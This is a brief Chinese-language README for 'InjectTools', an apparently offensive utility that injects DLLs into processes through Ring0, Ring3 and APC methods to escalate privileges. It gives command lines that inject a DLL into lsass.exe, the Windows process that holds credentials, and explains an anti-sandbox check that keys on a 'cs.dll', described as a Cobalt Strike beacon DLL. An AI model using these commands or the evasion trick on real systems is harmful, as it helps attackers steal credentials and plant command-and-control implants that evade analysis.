一款从Ring0和3以及APC注入的提权注入工具。 //开源无🐎🐎,relax!!
Example:
InjectTools.exe 你要注入的程序 DLL路径
InjectTools.exe lsass.exe C:\Users\ASUS\Desktop\artifact_x64.dll
example:
InjectTools.exe 你要注入的程序 DLL路径
InjectTools.exe lsass.exe C:\Users\ASUS\Desktop\artifact_x64.dll
这个反沙箱的其中一个原理就是检测同文件夹下是否有cs.dll(你也可以改成你喜欢的名字),你还可以直接创建一个假的cs.dll在同目录下(然后注入自己其他路径的DLL) (APC同理!!)
example:
InjectTools_SandBox.exe 你要注入的进程 你的DLL(或者同目录下的CS上线DLL)
InjectTools_SandBox.exe lsass.exe C:\Users\ASUS\Desktop\cs.dll